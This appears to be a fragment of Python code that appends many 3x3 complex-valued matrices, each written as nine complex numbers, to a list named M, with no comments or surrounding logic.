M.append([(107.208840926-19.8264875142j),(-5.5027007094-5.46646418509j),(-27.1721253261-6.32794530695j),(-50.9406084009+21.8784783426j),(101.498150677+18.4253902618j),(-4.5398588626+66.8709914072j),(-4.63860197772+4.38434606889j),(-0.161285814451+2.28483495895j),(115.293008397+7.40109725239j),]) M.append([(83.1261559129+9.38803179427j),(45.5583165019+0.0133763529746j),(10.9846545876-12.8609496534j),(6.88709553804-7.05716186963j),(76.0641811606+9.77812556192j),(-2.62751291643+9.77590518076j),(8.20943284108+22.7597404688j),(4.87721904995-58.1445409547j),(84.8096629265-13.1661573562j),]) M.append([(-63.4848594119+56.5970852121j),(-56.1291968879-259.357467504j),(-231.398794861+2.91503224973j),(-92.6121511914-142.65761239j),(326.89724878-111.191813281j),(-59.075864966-198.545920849j),(-55.8027153871+64.7880750523j),(-85.2100247697-85.6125174025j),(28.5876106314+60.5947280691j),]) M.append([(42.9264744574-211.530852922j),(-80.507738552+237.441389827j),(141.267337355-101.192708056j),(127.877668698-114.988232046j),(-82.3042002096+22.8417488219j),(116.311591785+66.0105649204j),(314.497143586-155.166473744j),(-389.013891157-65.2170411185j),(302.377725752+194.6891041j),]) M.append([(48.4613573723-45.3477303889j),(-5.61525424088-24.2642502577j),(-5.3062944881-11.8251261443j),(169.70212695+36.0921141398j),(146.330602761+33.9160278687j),(40.1976689852+8.71058695013j),(-106.79679685+66.5738461183j),(-40.1535355194+8.18155337411j),(71.2080398665+17.4317025202j),]) M.append([(53.149484936+14.3414732012j),(85.7605383308+9.11705104682j),(28.9415802182+112.389750727j),(19.4116921535+1.69180193413j),(88.4950053813+2.07257865672j),(29.4404763898+61.5360315053j),(-5.39555745888-5.98876684831j),(-16.8931286344+26.5306244834j),(2.35550968271-10.4140518579j),]) M.append([(31.8256035611+1.81752888686j),(-0.409389390434-0.0520249361519j),(-0.995259361224+0.0491265161576j),(-0.0747514692978+0.0187293609594j),(31.99542276+2.21089391995j),(0.14350961311-0.450807674126j),(0.552620738378-0.221244915985j),(0.231899191313-1.1483124471j),(32.1789736789+1.9715771932j),]) M.append([(-56.0472658866-117.627415385j),(65.7363427539-49.0971825282j),(-151.260011211+48.221675485j),(-56.5452993921+30.1373525941j),(113.599448498-24.4657528726j),(-8.21227740963+48.5231565179j),(-80.7755093512+205.379684375j),(-57.5345236604-63.8330113363j),(197.447817389+148.093168257j),]) M.append([(103.234599609+7.85520996978j),(-2.33164854508+2.58421891036j),(2.88111346155+9.02538509604j),(4.14233735772-6.91521695954j),(112.98347406-0.176400811004j),(-5.06063397479-7.1685828901j),(3.77675108501-6.64446536444j),(1.59377245583-0.908889873202j),(107.781926331-1.67880915878j),]) M.append([(84.0982015432+7.95498397868j),(-14.3519503116-29.7832508393j),(-3.62067832544-17.9848515627j),(2.92220469127+19.4363298519j),(65.1136072273+11.2387632872j),(-18.2261365667-0.108154352089j),(-13.7165868595+8.09193593915j),(-17.6500049244-23.4550949508j),(94.7881912296-13.1937472659j),]) M.append([(26.2048333038+34.7293920144j),(-44.9316256182-21.6315948077j),(-15.4403331115+4.27733172126j),(-38.6462170949-20.8017467207j),(69.0426425736-46.5642637309j),(-6.9190993479-16.7983385774j),(21.4331680699+26.2903561064j),(-31.8182859573+29.6792421702j),(43.7525241226+17.8348717165j),]) M.append([(2.03336548594+6.97796722131j),(-17.3672774951-29.1923924416j),(-20.7390815333-6.46167538432j),(16.0974424318-34.4374312968j),(72.5421426261+2.82703416112j),(17.9816453678-15.7603141053j),(-43.4840560616+11.5045481027j),(-29.9267016657-39.2650141689j),(1.42449188793-3.80500138243j),]) M.append([(95.9333215681+4.66528969949j),(-21.0461954232-14.7336267284j),(5.29838747142+19.6790980296j),(-24.1265384359+19.6846524094j),(74.2020435193-0.373418909745j),(27.308084889+19.333226032j),(-7.89724947856-18.46946915j),(28.0700524869-7.77820716496j),(84.8646349126+1.70812921025j),]) M.append([(103.494715443+2.14968426639j),(-0.457067079686-8.69420914244j),(9.00771134135-3.81202806542j),(-5.04343744517-0.690959949691j),(110.700373176-3.58377985742j),(8.13964152179-2.28022559964j),(5.2112929524-5.464199892j),(5.3227504255+4.91455128561j),(109.804911381+7.43409559103j),]) M.append([(72.2012859657-1.05678342967j),(-10.9080838118-22.2748545314j),(11.5222890472-8.83233074599j),(1.73934903764+17.5908988631j),(88.5060759461+11.1431330329j),(-7.42419042623-5.61952600985j),(17.342128251+30.7360534104j),(-14.5906240827+25.7152539126j),(83.2926380881-4.08634960326j),]) M.append([(57.8185612666-19.2254705227j),(13.4584681641+8.02181801009j),(25.9693187633-11.5248707562j),(11.6992485845-7.74530625528j),(56.0405557741+9.10800740186j),(-3.15359830788-9.33780730712j),(27.9285782198+1.70432843476j),(-14.9372365442+11.8179332334j),(74.1408829593+16.1174631209j),]) M.append([(79.2548504973+26.9142315582j),(-18.9527202875-32.8504240638j),(-22.2178437137+15.7992090823j),(-7.05926350907+37.5119276053j),(72.4831316064-21.6188741391j),(-9.36314453452+37.3918858397j),(-8.14470940159+2.68331208568j),(13.1640359256-10.6519465869j),(91.2620178963+0.704642580851j),]) M.append([(47.0944943454-29.2768716125j),(7.83033472656+66.3736426495j),(-14.9256774786-57.8831796554j),(-100.397642931-73.3036765988j),(166.03632425-40.6416145707j),(-124.098558934+64.0836088333j),(-96.3809533264-23.4094510628j),(100.080659747-58.9250992299j),(-51.1308185952+75.9184861832j),]) M.append([(103.109511394+2.59375025688j),(-0.509546803798+2.21343563561j),(0.582901435134-1.61857424372j),(-20.6390105342-7.12365028265j),(92.9290009937+19.6891397304j),(17.1103796315-14.6213966807j),(-19.733110006-4.47513387387j),(-10.0972808152+22.4331128144j),(121.961487613-16.2828899873j),]) M.append([(104.764585948+0.0949910115676j),(3.33002417385+0.596798674565j),(1.34597313517-0.844319898566j),(5.07100180835-2.80736036433j),(103.784928184+2.55286050165j),(1.6104477612-1.42618159105j),(7.54531761669+1.95953696037j),(2.06741224748+3.30489839624j),(103.450485869+3.35214848679j),]) M.append([(56.7008391517-2.49384756917j),(-7.65638008256+5.37181769602j),(0.424365368692+5.22098670768j),(4.12253803181-14.453600011j),(42.6469371145+9.08268142359j),(4.58698863198+3.97391093633j),(-14.4769664913-0.585408054014j),(10.2452641725-11.7450965914j),(38.6522237338-0.588833854422j),]) M.append([(90.7773395389-9.18767707688j),(-10.418950034-5.87712591792j),(0.227043884082-25.5837154845j),(-20.8424894464+10.4451371535j),(103.285474104+6.09256361907j),(-13.8547127218-15.5166536657j),(1.31694666096+11.2037862683j),(10.4422451357+4.39606357009j),(112.937186357+9.09511345781j),]) M.append([(83.4353822047+1.21953454074j),(-1.83350460601-0.0928528247736j),(5.68150761034+1.89571326185j),(5.19824203347-9.53574846327j),(90.4718255031+3.50811587276j),(2.32147920331+12.4939416804j),(-4.26273439415-7.7754582575j),(4.32898410403-1.94011927369j),(97.0927922922+1.2723495865j),]) M.append([(97.8826754899+1.05812916064j),(4.29086442229-2.16240195377j),(-0.43970709401+2.39305862163j),(-4.0059175841-5.70385309845j),(108.845049607+1.60969685467j),(-5.82416565815+3.85162870282j),(-1.12012743504+5.47018370548j),(-5.34493130602-4.45024658875j),(105.272274903+3.33217398468j),]) M.append([(63.0188732961-2.32002598084j),(-26.5263495225-6.80593285527j),(30.1707442852-29.9481902266j),(-15.4902322603+2.020579116j),(90.1209429287+2.75081398151j),(7.63711955432-15.6538648153j),(-2.86987901764-8.72090292541j),(-0.98724697834-5.86428929251j),(111.860183775+5.56921199934j),]) M.append([(115.599669638+2.15885844651j),(1.10672546575+0.519209712864j),(0.144995959343+0.389858171991j),(-0.384611649554-0.802521652122j),(116.514515943+2.21260374613j),(0.204556420019-1.34435916625j),(-0.509043065487-0.254908893977j),(-0.765647723159-0.810020528356j),(114.885814419+1.62853780736j),]) M.append([(103.714420252-2.70629491497j),(-1.10594582824+2.09655430896j),(-4.33436748142+0.549914321833j),(2.11814828873+18.3494589619j),(119.36413289-0.446648064098j),(3.65466993825+8.60639824778j),(-6.81760005716+11.7385017355j),(8.9666993407+3.23213563868j),(105.921446858+9.15294297906j),]) M.append([(73.3338050281+14.7922699985j),(1.50966448139+4.59743614815j),(7.56686118434-27.8800428596j),(-5.16208817755+19.6370222039j),(72.620061692-7.0213726362j),(-31.3697767057+2.97368206017j),(5.42501717053+31.1842952571j),(-10.4090328429+2.85083763122j),(74.0461332799-1.77089736225j),]) M.append([(89.4250454553+6.56818061704j),(-1.86279187473+6.2495121014j),(-6.67277555277+11.9023815295j),(-13.5226148719-24.7526053193j),(74.9555615767+0.654221186688j),(-24.8263304819+13.2602049791j),(-16.6172511684-33.9156048357j),(-16.6840542379-9.90140440362j),(78.619392968-1.22240180373j),]) M.append([(11.9938464403-14.3613632494j),(62.9727426291-10.0307934259j),(-93.7463211248+14.9325165716j),(-37.6106390315-162.861683868j),(189.664634292+104.69529765j),(-163.174671459-166.305425481j),(-40.4367903053-35.337621729j),(54.6678791195+38.9772797171j),(-39.658480732-84.3339344009j),]) M.append([(107.010466044+2.88299923348j),(-4.10088716508-4.96073944298j),(1.33409354945+2.99242377768j),(-3.93454171164+7.06731788195j),(107.031857457+2.26917194474j),(1.12099552561-2.62986457929j),(1.09069391026-0.22807857244j),(1.05768140694-0.211453593713j),(103.957676498+0.847828821779j),]) M.append([(102.372568008-7.90276722606j),(2.88659899555-4.44966450593j),(-11.8943292963-2.91888020467j),(3.11077206715-15.5834929238j),(105.465172141-4.6320779913j),(-17.6942186833-5.67660980498j),(-12.8623052835+4.58294840055j),(-7.86581953351-0.681560591199j),(104.16225985+18.5348452174j),]) M.append([(43.4025617558-1.31443566795j),(-12.6802058063-16.7321034144j),(-10.6349510615+5.47092031771j),(-3.07192633231+4.4993318506j),(48.1746582726+12.4974908693j),(7.77500505485-3.08155478629j),(-3.63856869135-2.31614722819j),(13.0513915909+0.481646569949j),(46.4227799715-5.18305520135j),]) M.append([(104.534660913+0.813764244522j),(-3.11258122515-1.9356095709j),(-2.00194110069+4.41381869142j),(-3.78356505249+6.03381451146j),(107.712987688-3.5182761062j),(-6.02857205634-12.220887061j),(-0.651174340128-5.39436353991j),(-2.40419667922+7.18120283083j),(109.752351399+8.70451186168j),]) M.append([(80.5042520632-40.3526752905j),(16.2662186147+27.6569649154j),(-29.6207843755-8.43523237954j),(24.3329166907-46.4366345254j),(86.6664795716+35.268476613j),(-6.10003641438-31.1404158177j),(-42.4050141538-20.4123285126j),(32.7002197417+9.77264633818j),(80.8292683653+11.0841986775j),]) M.append([(100.405119192+51.9848317716j),(46.238801719+48.140985255j),(24.479053539+13.1297437074j),(15.1448981184-30.1520579686j),(85.9023351983-38.8217746168j),(-2.8582644146-10.7435554421j),(30.2916145129-4.29906221012j),(33.4910158056-21.0694909907j),(95.6925456099-7.16305715479j),]) M.append([(104.111454962+3.89120750764j),(-1.64449549317-4.27907078708j),(1.36244712443+6.13885762784j),(5.78649272376-16.8219745231j),(85.7864694658+18.9354011193j),(9.11995445794-23.7932168796j),(3.74836492888-18.8755133799j),(-11.1316164982+15.7256517412j),(108.102075572-16.8266086269j),]) M.append([(104.583774561+15.3406649206j),(-25.6384338397-0.138909607011j),(17.0628929786+10.249659323j),(-0.921500607856+21.5893737655j),(68.4272231263-15.4214312042j),(19.1828822231+24.6414291483j),(-18.4159134682-12.4224392284j),(33.1819482403-21.2265410832j),(68.9890023122+6.08076628364j),]) M.append([(40.5226854468+2.97225640787j),(24.1251821878+0.542460508749j),(-10.2302385621+21.7905964093j),(6.03436241276+9.5838915965j),(49.6905771936+27.3636841183j),(9.45470104301+50.7642088458j),(1.19564609692-13.4008600072j),(2.27337077698-43.6035245419j),(50.7867373596-24.3359405261j),]) M.append([(126.373034369-0.671061487297j),(-21.5699830918-8.45122542998j),(16.5734329192+19.4003354306j),(2.36705452683-9.57427849801j),(101.801972762+13.0304498313j),(15.6227373001-5.51539112495j),(-15.631667735+28.1568106569j),(55.7876528484-18.0408622867j),(58.8249928684-6.35938834405j),]) M.append([(108.071664868-71.4037564941j),(1.56393400326-76.4752091259j),(-171.258718609+95.8346193299j),(-77.6472447877-215.33124007j),(29.2353093157-218.586813667j),(-390.644552174+460.531236323j),(-99.9843187025-51.5069837149j),(-101.07178506-52.1459099593j),(121.693025816+295.990570161j),]) M.append([(108.55000139-1.98947856971j),(-5.80234154293-3.87713668958j),(-6.08919835762+7.71987580455j),(1.15901836504+2.97081722637j),(116.137333567+4.34291634007j),(2.49278502553-1.07225793949j),(-4.40198855979-6.46499509153j),(-3.77429026163-6.73625973356j),(106.312665043+3.64656222964j),]) M.append([(132.75351242-0.941503667075j),(1.55260680487-13.4017125053j),(23.5416087812-43.6853171488j),(11.6207741004-10.2414904876j),(106.909545272-7.42139089593j),(-4.26025027605-42.9528898657j),(-26.6331504351-30.4870329203j),(-19.5782561285+5.02229605772j),(19.3369423077+14.362894563j),]) M.append([(395.402293685-157.259286192j),(167.307095041-373.402078939j),(-510.113796178-119.748466741j),(-72.9448227202-299.712376143j),(-190.72291899-247.670642443j),(-235.870057563+439.122113812j),(-145.781036549-206.663114522j),(-309.548716933-100.548323311j),(67.3206253049+410.929928636j),]) M.append([(108.970484381-0.331232166641j),(-1.20561375736+4.72200024872j),(1.3003180808-3.31772169211j),(-2.03092519627-14.9414689605j),(105.629672539+4.48055894614j),(1.12802377317-0.431261017767j),(-3.4322615877+0.9352169645j),(0.211198995071+2.93545100647j),(115.39984308+1.85067322051j),]) M.append([(106.2290126-0.0188285990807j),(0.782797230455-2.85489959181j),(3.33501917771-4.81082772103j),(0.148201327403+4.17812912784j),(104.976205052+4.01767557709j),(-2.97960544226+4.02885015977j),(4.49795996368+5.61488820782j),(2.9759579641-1.54446211848j),(107.794782348+2.00115302199j),]) M.append([(32.6906148141+2.72819674757j),(-2.29520274699+7.73279274947j),(-7.62849437141-9.30422773894j),(21.1077783308-19.413250254j),(14.3689186182+11.7093615655j),(-14.5836323442-2.66535280905j),(11.6712460866+18.7854492977j),(-7.85312015441+1.75730728985j),(13.9404665677-8.43755831305j),]) M.append([(113.235231639+4.05798545152j),(6.51428042294-2.22345190172j),(0.315201573253+4.30127417188j),(1.12661286649-0.877225006837j),(107.333703268+1.02042763224j),(1.42972525882-4.5147444418j),(-2.02061470985-2.06138600727j),(-2.42347447817+3.84716215473j),(106.431065093+0.921586916236j),]) M.append([(118.716577004-7.72386056484j),(17.3552896337+29.1588265616j),(-16.5772187451-83.384729315j),(-10.5690693909+71.865224813j),(4.62083128351+9.63239939838j),(69.0889945499+4.47479147583j),(-2.54965824894+12.6018477088j),(-4.24957623403+1.44553753673j),(45.662591712+4.09146116645j),]) M.append([(83.7399311368-14.9281414613j),(16.8571099793-5.42759303242j),(35.5006633752+19.9954720544j),(-9.41002270333-39.2278419525j),(123.411928372-0.304837910961j),(19.5564805283+29.7682435964j),(57.3661123281+1.63163454459j),(-11.3413338032+30.9578546892j),(39.8481404913+21.2329793723j),]) M.append([(104.882296689+6.38036434483j),(0.277564331202-4.06250057681j),(-3.10975339188+8.11042984153j),(-4.82173536056+9.53879946861j),(110.868412743-2.85662837855j),(1.7225165196+6.51764111113j),(-4.74005031089-5.03091968811j),(3.47274325311+1.64088625119j),(105.249290568+2.47626403372j),]) M.append([(84.9630137912-6.57371505148j),(31.5660478965-13.9371323757j),(11.8318898985-23.3451046785j),(1.12758507119+1.03534600173j),(98.1173090175+4.40061947786j),(-1.82216479753+4.21112637191j),(5.97204107424+28.3273456388j),(-49.2800812259-26.700887515j),(60.9196771913+8.17309557363j),]) M.append([(112.117856332+3.76615850803j),(-9.6435432739-0.143209251011j),(5.22497339494+8.56598608368j),(1.15693398678-1.52861038219j),(107.101439328+4.18931588495j),(3.54399526985-0.266687376394j),(-3.69541330965-0.316123256348j),(6.70041436485-4.31682110037j),(99.7807043397-1.95547439298j),]) M.append([(47.1606603708-24.8142309301j),(-22.6621268686-19.7207921171j),(-11.9001304423-37.8715425727j),(31.1241151373+31.1346871586j),(90.3655622197-13.8336143123j),(63.3655601591+17.5333261438j),(-14.7734783991+22.2496997944j),(19.7762296467+26.0106304135j),(40.4737774095+44.6478452424j),]) M.append([(47.350121696-5.23476485548j),(25.7684413004+3.59611313899j),(-22.1832367356-2.63880258732j),(20.22523295+11.7440389592j),(35.1935868528+28.0053159005j),(4.57721898248-28.7755323757j),(7.48774610307+2.20667885996j),(17.812444474+21.5983883631j),(26.4562914511-16.770551045j),]) M.append([(66.9682691232+12.3399494673j),(-2.90167114442+18.9739197284j),(-27.2078809831-25.3888451508j),(-6.49677340725+12.9351764844j),(24.7790157843-1.27830149358j),(13.0110380243-8.86352177105j),(-31.204234543+22.9421952216j),(-14.4282840148-14.1594372758j),(70.2527150925-5.06164797372j),]) M.append([(62.8581146279+17.67412552j),(8.87376820767-30.4623200328j),(1.05180150903+34.1982240897j),(-24.3851205058+17.9418554251j),(97.0141500115-25.0464467713j),(9.81080154865+31.5323205078j),(-10.7928986753+2.46774385021j),(6.78454680557-9.62372926201j),(89.1277353606+13.3723212512j),]) M.append([(79.817521175-30.0752762645j),(-46.8411075019+16.0237496039j),(47.0407331086+3.35340129749j),(-1.34214274621-30.0946975693j),(68.4033704077-2.18114756451j),(28.9599889077+12.3729512067j),(23.9681464663-20.9219168412j),(-8.17173900136-36.9019859844j),(95.7791084173+38.256423829j),]) M.append([(116.710493513+1.22714603149j),(2.8592611768-3.83068771101j),(-1.58555680205+3.13683767719j),(3.37554624305-5.69255200255j),(102.484163648+1.21977963845j),(-0.827745458944+1.31349704268j),(9.94191395066+1.87264244389j),(1.25123734328-2.89437440017j),(101.805342839+3.55307433006j),]) M.append([(66.9899078241+9.27299525348j),(24.8535014676+25.4360599978j),(-46.9091634832+21.7788058913j),(-0.310994324003-6.85091937866j),(101.057086255+7.93655937914j),(-8.18352578451-4.51977937707j),(-15.8344307798-11.2795230173j),(-6.79416820585+13.6093292643j),(81.9530059213-11.2095546326j),]) M.append([(34.3288080591+1.88510998346j),(0.68109567869+0.146448704822j),(-0.354150724209+1.48192797477j),(0.448762222856-1.2484421177j),(39.7748630724+1.67653253813j),(6.20370880247-2.84811112539j),(1.51301530355+0.00965813144067j),(5.07025249096+1.98389846205j),(39.8963288685+2.4383574784j),]) M.append([(46.6105513933-18.4425624618j),(-58.2581981618+10.8145263259j),(-11.4156546819+62.5918005122j),(20.7525983926-16.9988766964j),(-31.2212145742-15.8760889658j),(-42.8460295719+60.4444203458j),(-13.3865653488-17.6673943163j),(-18.2531416483+39.2165173818j),(67.6106631809+40.3186514276j),]) M.append([(112.867462127-31.1473172887j),(-7.60609771859-45.1463317085j),(-29.6703881287+27.0093301731j),(-13.9275516205+18.069379283j),(97.2273971989+30.0045794775j),(22.9017283043-9.8040666365j),(53.4523291121-37.9144088783j),(44.806630601-73.3966612613j),(28.9051406736+7.14273781123j),]) M.append([(80.7808565755+5.1698298164j),(33.0501414784-7.54348903944j),(-3.40654280088-32.932479908j),(13.8585095174+28.6539369689j),(80.1422840683-39.5782939351j),(-39.5236585292+20.1994959036j),(31.3335361106+16.2220576374j),(-42.2884613997-29.5613151416j),(80.0768593562+40.4084641187j),]) M.append([(61.6451623078+60.4757972195j),(-27.1542702894-34.6392529183j),(37.3395953087-50.661714573j),(-14.1434566632+17.9512426698j),(94.9978580689-7.60029274304j),(13.4416488175-8.73820173156j),(14.0322636272+58.8044266723j),(-33.725961153-5.31965169774j),(90.3569796234-46.8755044765j),]) M.append([(103.506601887+2.46666265812j),(-2.60673004204+14.9532203536j),(2.36827820063+13.5026385752j),(-4.46037607134-3.87275920797j),(98.8595851351-5.15566031669j),(2.30997850824-6.45160698463j),(6.05037473674+5.45025717821j),(-5.09670043666+4.64318775134j),(86.6338129774+8.68899765856j),]) M.append([(61.0716827019+10.4365121253j),(4.35172138025-14.1999093315j),(1.25683125151+5.22974184426j),(-16.3682001195+21.3094410018j),(76.5433039565+2.91940729104j),(14.5434771918-8.70934675572j),(-30.1504000249+14.8546326602j),(40.3485508035+15.7924728126j),(63.3850133416-7.35591941635j),]) M.append([(46.5217031754+8.97344441818j),(-12.3908209692-7.23522889427j),(-4.302785004+4.74507470689j),(-7.15506528685-0.576445702978j),(52.9395027-4.37173109708j),(-1.68281579631-3.94773027872j),(2.84720185976-0.775193018253j),(2.43885839278+4.28897010728j),(51.5387941246+1.39828667891j),]) M.append([(28.6554745286-1.35202590755j),(-3.63020281011+3.82871542186j),(-3.22088131897-1.50826934263j),(-2.97425468677-11.8233098364j),(20.8213304642+3.05076322079j),(-5.53661306267-5.36851770791j),(-10.8816717287-4.1910733779j),(-4.46421732196+8.24869242705j),(24.5231950072+4.30126268676j),]) M.append([(83.9822665644+6.50286447986j),(23.3496095913-10.3482934732j),(10.3533664943+14.9521894185j),(17.6381576824-9.55221710371j),(37.4345655222-6.57954759065j),(6.22130126702+2.77790643837j),(39.2773331639-25.8677294281j),(11.2630466109-19.7960169533j),(47.5831679134+6.07668311079j),]) M.append([(-68.7898553045+109.315504664j),(-60.2153185138+103.36724286j),(-127.759344107-254.228966265j),(122.245094576-41.7342223985j),(152.809067284-53.3436565131j),(39.5959686057+179.943030432j),(-40.3884700143-29.4140190703j),(-30.7140464564-4.42318455995j),(146.98078802-49.9718481511j),]) M.append([(97.8305076811-2.28762176738j),(-3.13222991763-3.52657091563j),(-5.44901005541-4.32747480654j),(-4.94054751494+7.12818273609j),(95.495837399+3.91248384652j),(5.30710164764+1.02133765261j),(-3.17183818024+0.359957935376j),(1.80629593824+0.543099561085j),(95.6736549199+4.37513792086j),]) M.append([(78.5657219512-32.5311759817j),(36.3256193595+78.1727605516j),(58.9273605315+36.5093314537j),(18.7776133389-12.274188638j),(50.501766099+25.08134882j),(-15.5288826723+39.0499745089j),(-0.964196297987-9.38404108823j),(4.4663150423+18.5140493673j),(102.93251195+13.4498271617j),]) M.append([(68.8127356171-15.7627216648j),(-16.0732472242+6.93950767782j),(8.71814900893+24.1043640624j),(2.16004701542+28.4647423703j),(53.3020140262-16.3835521448j),(-27.9611243524-6.59736198829j),(31.9364001307-29.3239428194j),(-29.6443073409+12.3058289842j),(62.8852503567+38.1462738096j),]) M.append([(96.954933476+10.9888302885j),(-24.0988393277+8.7223341754j),(0.61895223716+13.7823354788j),(1.62794334517+1.65936113735j),(98.1490454959+9.05145459751j),(4.017910385+1.58109316989j),(1.62778711424-13.5680363192j),(25.4179755324-3.42482299146j),(97.8960210281-14.040284886j),]) M.append([(92.7725070745+2.02737577746j),(1.55721320142-0.970518872733j),(-0.776956160744+0.958023582519j),(-0.388046885385+2.35379974458j),(96.1548263431+2.47099550902j),(-5.01063804475+2.86546189138j),(0.916547751398+0.160488182157j),(-1.29707660564-0.494527905625j),(93.0726665824+1.50162871352j),]) M.append([(80.0828632975-2.15800294447j),(14.7917454177+7.3357673044j),(13.4640813058-9.21550103652j),(21.6212993298+19.7727502321j),(53.590481019+16.1941027976j),(17.178684018+6.64063019415j),(23.2585990348-15.7845779469j),(17.7904316154+0.29769596569j),(52.3266556835-8.03609985318j),]) M.append([(54.1746609718+6.04141477707j),(-10.9723164598+7.80618916775j),(8.20355244824-0.449100017823j),(-7.47349728513-7.9557913005j),(49.5396577665-11.2344191894j),(1.33505871712+9.76755974918j),(2.35067987686-13.3651443495j),(4.06548153187-21.6788843918j),(52.2856812616+11.1930044124j),]) M.append([(54.8156549715+22.1984039563j),(-2.42608120369-45.2521690864j),(-22.0536552969+52.1807483657j),(37.8096954814+48.4512169586j),(83.418693136+16.391001573j),(55.2127434422+1.85781656724j),(38.7563149271-11.3312257026j),(0.371859337191+29.4109289769j),(128.765651893-32.5894055293j),]) M.append([(26.737243781-0.681104519503j),(-0.721198784473-9.84045835332j),(5.7336198019+19.1372397757j),(-4.33191764895-0.350856002137j),(7.55808939216+21.4494711318j),(-28.2367906376-31.2755636698j),(-3.90084238827+0.927025700583j),(-19.2374773242-15.0596629342j),(65.7046668269-14.7683666123j),]) M.append([(32.8906872793+2.80314211001j),(0.908478883553+0.656554077595j),(1.10691658678-0.553069731715j),(0.405896050379-0.141366166763j),(31.8282345793+1.61369622239j),(0.431781375033-0.304942244571j),(-0.252045042217-1.18890369252j),(-1.05170823762-0.841936146739j),(31.2810781414+1.5831616676j),]) M.append([(46.531692579+8.60985499983j),(-72.8716613322-12.2630798982j),(-14.8406135834-16.5265534724j),(-16.2403151631-6.35731066541j),(109.973387939+6.71179164444j),(17.1519121912+16.6507841658j),(7.58907451285+5.84454021197j),(-40.1342326498-13.5900170867j),(25.4949194819-9.32164664427j),]) M.append([(88.0912400005-8.76751113137j),(3.00564164188+19.5320791001j),(5.20352584571+6.03130839323j),(3.02381461319-21.5302347222j),(86.2177321098+12.5315789098j),(-6.1497740369+16.4709158316j),(11.3087927812-0.863683693547j),(-8.06181184167-8.10456024674j),(90.6910278898+2.23593222154j),]) M.append([(110.036437089+0.634559622748j),(-4.07309728964+3.45887066358j),(1.74642890487-8.15870682083j),(-1.28799603363+2.71269003865j),(110.696572873+3.78765953188j),(-1.1465004935-0.924631337306j),(-0.54121974004+3.3571951498j),(4.07290001067+4.40213587012j),(103.266990038+1.57778084537j),]) M.append([(121.570437475+17.4408763184j),(20.4244055242+33.0881945208j),(7.56258994608-8.60571573991j),(-64.7221791724+1.9763895212j),(21.4693659897-41.9569888072j),(-21.8134675383+32.7579482976j),(-43.9828626118+26.7701638837j),(-71.8407861904+1.71415294764j),(103.960196535+30.5161124888j),]) M.append([(91.2046033873+10.6479438669j),(-5.40889456686-0.845037442086j),(0.6937459967-7.71232953249j),(-0.323743889356-8.13666530684j),(97.6164960173+0.595865978018j),(-0.858051567893+6.11736623964j),(-9.51455141743+9.8923964734j),(-8.56494562762-4.52194438075j),(100.178900595-5.24380984488j),]) M.append([(32.3763572332+1.64237969904j),(8.48665467413+1.90257438381j),(-6.41581517373+0.290044675085j),(0.710995398518-0.249899442812j),(40.0129682661+8.35566672172j),(-6.83828509817-2.7369415263j),(0.212598260307-1.17680706006j),(-5.57703685307+7.20178387579j),(37.6106745006-3.99804642077j),]) M.append([(69.9338852576-38.7298234498j),(19.7162224593-23.5078433056j),(45.8889578944+32.7873809676j),(7.06996414076+75.875841751j),(38.0187620779+44.2619172785j),(-83.7426275687+11.0303664212j),(-1.83571775918-35.1465206629j),(0.234139796799-19.5059408638j),(81.0473526644+0.467906171296j),]) M.append([(24.8459014294-3.18988391277j),(4.21893321253+8.28905520699j),(-7.70491555646-5.07067484375j),(6.40284822595-3.36886693853j),(24.7163364411+3.53896810445j),(6.46667264998-4.53708370797j),(-7.70527694014+2.85999252555j),(7.8128639546+0.501278739247j),(24.4377621295+5.65091580832j),]) M.append([(32.5689822954+2.47638697605j),(0.608679101246+0.410841657645j),(-0.215993187334-0.27720149066j),(-1.14824536111-0.299418083098j),(31.6107746729+1.16561813446j),(0.268803447812+0.181484115263j),(0.324776827427-1.18431921862j),(0.554566826353-0.535301944683j),(31.8202430317+2.35799488949j),]) M.append([(-1.60328767231-306.281449105j),(-100.53184245-491.215823682j),(-77.6534755632+339.673194658j),(358.568719132-53.7538701499j),(651.171807267-23.9037707311j),(-360.235170441-140.902043293j),(234.177165092-511.456555855j),(458.273022152-739.369210348j),(-400.568519595+336.185219836j),]) M.append([(22.619756081+1.8083867814j),(-39.4546420454+39.2636604791j),(-134.555539877-10.3942348308j),(65.9429551622-74.1340354898j),(98.3087517038-63.5814663669j),(117.997141253-115.134813135j),(38.6719291866+39.3251723605j),(37.7772914732+2.53077971519j),(163.071492215+67.7730795855j),]) M.append([(82.8155516734+14.1389867343j),(-11.3615087406-2.75524334498j),(-9.97521611754-25.7381793568j),(-0.514839668493-8.19457299158j),(107.665231048-1.34363971708j),(-0.0989402295469+13.7379154211j),(-15.2421437965+32.5491601226j),(-13.8292257659-1.92582290742j),(68.5192172787-6.79534701724j),]) M.append([(101.978314775+4.83162432594j),(-5.93987711244+1.50515717356j),(-1.17762125774-6.82730868733j),(-1.42395065684+2.04430749278j),(98.2997079276-0.994939761578j),(4.978887794-1.11003248149j),(1.61799909598+0.200111136152j),(-0.288527846818+2.79702701374j),(97.7219772974+2.16331543564j),]) M.append([(39.0634123991+26.5928926752j),(15.3335683887+19.6791045325j),(-17.0722566395+15.1028647903j),(-4.3225005476-18.6105362677j),(25.8294086222-9.45443368976j),(9.56167612457-14.8734582401j),(-21.1982547464+1.82224323946j),(-15.3903239772+14.7435185288j),(26.1071789787-11.1384589854j),]) M.append([(30.9031488591+2.5025078402j),(-0.832313793284+1.00256063077j),(-1.58046128076+2.17671432412j),(0.757003534212+0.573465573063j),(32.8718276952+2.01019977374j),(1.62260999119+0.366590408911j),(0.920799224768+0.0998756104828j),(0.466929029016-1.01171728713j),(32.2250234458+1.48729238607j),]) M.append([(31.4555350143+2.22860330331j),(-0.288443941882+0.498326477372j),(0.143265764952-0.206456113955j),(0.869112472777+0.335886943324j),(31.5633723191+1.36235788449j),(-1.25555160167+0.577650700362j),(0.00446485042138-0.394297665131j),(0.347835069296+0.824326060066j),(32.9810926666+2.4090388122j),]) M.append([(63.9468526432+5.013761185j),(22.6583656809-30.3610949775j),(-3.99408766893+28.8776264429j),(-7.58298244464+32.6336970429j),(84.4299080762-27.6313629792j),(25.1285805057+12.8393245586j),(-35.630274091-9.12604398033j),(31.7163147897-22.3061947898j),(90.6232392805+28.6176017942j),]) M.append([(67.1795333473-0.877084581611j),(-30.5116050186-6.6470512879j),(-5.14148817701-4.66071442731j),(-35.7700426407+3.80499676503j),(78.2623024787+3.1440451941j),(-13.422055098-1.81081303106j),(17.0568489035+4.30715925352j),(-5.14000282867+4.46452700996j),(111.558164174+3.73303938751j),]) 